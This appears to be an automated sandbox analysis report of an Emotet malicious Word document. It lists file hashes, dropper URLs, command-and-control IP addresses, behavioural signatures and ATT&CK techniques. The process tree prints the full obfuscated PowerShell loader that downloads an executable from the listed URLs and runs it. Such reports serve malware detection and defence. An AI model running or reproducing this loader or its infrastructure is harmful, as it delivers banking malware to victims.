emotet | 92a8c9729a35ef4fbe97b8b931ac2ba3284ff4c1aaaab30eadbe36ad12c75465

General

Target

SecuriteInfo.com.Exploit.Siggen2.13694.14795.18048.doc
Size

168KB
MD5

99fb1033909db6b78ec2162ec3a2c9ab
SHA1

e10742dd869b2571b54fbb908b522b8fae2cc328
SHA256

92a8c9729a35ef4fbe97b8b931ac2ba3284ff4c1aaaab30eadbe36ad12c75465
SHA512

26f9db7838e4ec8c247a59411730c32d7b61361b3a435e80d103b65141d71693287418d739d24e8ffe24a45eaa383e4b7f226a371dba1183693857c419d00f78

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://rectificadoscarrion.com/wp-includes/EiQ/

exe.dropper

http://renekok.com/QbWyat/

exe.dropper

http://www.onlinemediadesigns.com/bin/nObh/

exe.dropper

http://renegaderadio.net/haunted/cA5zuC5/

exe.dropper

http://qatifsport.net/t/NbQq254/

Extracted

Family

emotet

C2

73.116.193.136:80

185.94.252.13:443

149.62.173.247:8080

89.32.150.160:8080

185.94.252.12:80

77.90.136.129:8080

83.169.21.32:7080

104.236.161.64:8080

114.109.179.60:80

189.2.177.210:443

68.183.190.199:8080

144.139.91.187:443

185.94.252.27:443

190.181.235.46:80

82.196.15.205:8080

46.28.111.142:7080

181.167.96.215:80

202.62.39.111:80

219.92.13.25:80

191.99.160.58:80

rsa_pubkey.plain

Signatures

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 4020 powersheLL.exe
Executes dropped EXE 2 IoCs

Processes:

285.exeieUnatt.exe

pid process

3992 285.exe
3924 ieUnatt.exe

description	pid	process
Token: SeDebugPrivilege	4020	powersheLL.exe

pid	process
3992	285.exe
3924	ieUnatt.exe

Emotet Payload 4 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral2/memory/3992-9-0x00000000005B0000-0x00000000005BC000-memory.dmp	emotet
behavioral2/memory/3992-9-0x00000000005B0000-0x00000000005BC000-memory.dmp	emotet
behavioral2/memory/3924-12-0x0000000000500000-0x000000000050C000-memory.dmp	emotet
behavioral2/memory/3924-12-0x0000000000500000-0x000000000050C000-memory.dmp	emotet

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

WINWORD.EXE285.exeieUnatt.exe

pid	process
496	WINWORD.EXE
496	WINWORD.EXE
496	WINWORD.EXE
496	WINWORD.EXE
496	WINWORD.EXE
496	WINWORD.EXE
496	WINWORD.EXE
496	WINWORD.EXE
496	WINWORD.EXE
3992	285.exe
3924	ieUnatt.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

496 WINWORD.EXE
496 WINWORD.EXE
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4020 800 powersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4020	800	powersheLL.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powersheLL.exeieUnatt.exe

pid	process
4020	powersheLL.exe
4020	powersheLL.exe
4020	powersheLL.exe
3924	ieUnatt.exe
3924	ieUnatt.exe
3924	ieUnatt.exe
3924	ieUnatt.exe
3924	ieUnatt.exe
3924	ieUnatt.exe

Blacklisted process makes network request 1 IoCs

Processes:

powersheLL.exe

flow pid process

22 4020 powersheLL.exe

flow	pid	process
22	4020	powersheLL.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

285.exe

description	pid	process	target process
PID 3992 wrote to memory of 3924	3992	285.exe	ieUnatt.exe
PID 3992 wrote to memory of 3924	3992	285.exe	ieUnatt.exe
PID 3992 wrote to memory of 3924	3992	285.exe	ieUnatt.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Drops file in System32 directory 1 IoCs

Processes:

285.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\adsmsext\ieUnatt.exe 285.exe
Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\adsmsext\ieUnatt.exe	285.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.13694.14795.18048.doc" /o ""
1⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Enumerates system info in registry
PID:496

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABUAFUATwBPAEYAagBqAGQAPQAnAEoARQBPAFUAUwBkAGUAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBDAFUAUgBpAHQAeQBQAGAAUgBvAFQAbwBDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEMAVQBaAFEAWgB0AHkAYQAgAD0AIAAnADIAOAA1ACcAOwAkAE4ASQBCAEMAQwBvAHMAdgA9ACcASgBPAEYASwBIAHAAdABvACcAOwAkAEcARwBNAEIAUQBiAHkAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQwBVAFoAUQBaAHQAeQBhACsAJwAuAGUAeABlACcAOwAkAFMAQgBDAFMATQBmAG8AZAA9ACcASQBCAFYATABPAG0AcABuACcAOwAkAE4AVwBEAEcATAB4AHIAbwA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAATgBlAHQALgBXAEUAYgBjAGwASQBFAG4AVAA7ACQATwBaAEQAQQBLAGcAdgBwAD0AJwBoAHQAdABwADoALwAvAHIAZQBjAHQAaQBmAGkAYwBhAGQAbwBzAGMAYQByAHIAaQBvAG4ALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEUAaQBRAC8AKgBoAHQAdABwADoALwAvAHIAZQBuAGUAawBvAGsALgBjAG8AbQAvAFEAYgBXAHkAYQB0AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbwBuAGwAaQBuAGUAbQBlAGQAaQBhAGQAZQBzAGkAZwBuAHMALgBjAG8AbQAvAGIAaQBuAC8AbgBPAGIAaAAvACoAaAB0AHQAcAA6AC8ALwByAGUAbgBlAGcAYQBkAGUAcgBhAGQAaQBvAC4AbgBlAHQALwBoAGEAdQBuAHQAZQBkAC8AYwBBADUAegB1AEMANQAvACoAaAB0AHQAcAA6AC8ALwBxAGEAdABpAGYAcwBwAG8AcgB0AC4AbgBlAHQALwB0AC8ATgBiAFEAcQAyADUANAAvACcALgAiAHMAcABgAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUwBTAE0AQQBOAG8AYwB1AD0AJwBEAFQARwBGAFoAcABhAHMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFoATgBaAEkASQBpAG4AaQAgAGkAbgAgACQATwBaAEQAQQBLAGcAdgBwACkAewB0AHIAeQB7ACQATgBXAEQARwBMAHgAcgBvAC4AIgBEAE8AdwBuAGAAbABgAE8AYABBAGQAZgBJAGwAZQAiACgAJABaAE4AWgBJAEkAaQBuAGkALAAgACQARwBHAE0AQgBRAGIAeQBpACkAOwAkAEYAVgBWAFYATgB5AGsAawA9ACcASwBYAEEAVABVAHUAZQBiACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARwBHAE0AQgBRAGIAeQBpACkALgAiAGwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMwA2ADkANQA3ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAFIAYABlAGEAYABUAEUAIgAoACQARwBHAE0AQgBRAGIAeQBpACkAOwAkAFMATgBPAFEAUwB5AGsAagA9ACcAQwBDAEcATABWAGcAawBzACcAOwBiAHIAZQBhAGsAOwAkAFcARQBPAFAARAB2AHIAeAA9ACcASwBZAE0AQQBYAHQAagBhACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEARgBEAFcARABvAG4AaAA9ACcARQBNAEUATgBLAGIAcQBmACcA
1⤵
- Suspicious use of AdjustPrivilegeToken
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
PID:4020

C:\Users\Admin\285.exe
C:\Users\Admin\285.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
PID:3992

C:\Windows\SysWOW64\adsmsext\ieUnatt.exe
"C:\Windows\SysWOW64\adsmsext\ieUnatt.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
PID:3924

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\285.exe

Download Submit
C:\Users\Admin\285.exe

Download Submit
C:\Windows\SysWOW64\adsmsext\ieUnatt.exe

Download Submit
memory/3924-10-0x0000000000000000-mapping.dmp

Download
memory/3924-12-0x0000000000500000-0x000000000050C000-memory.dmp

Filesize
48KB

Download
memory/3992-9-0x00000000005B0000-0x00000000005BC000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads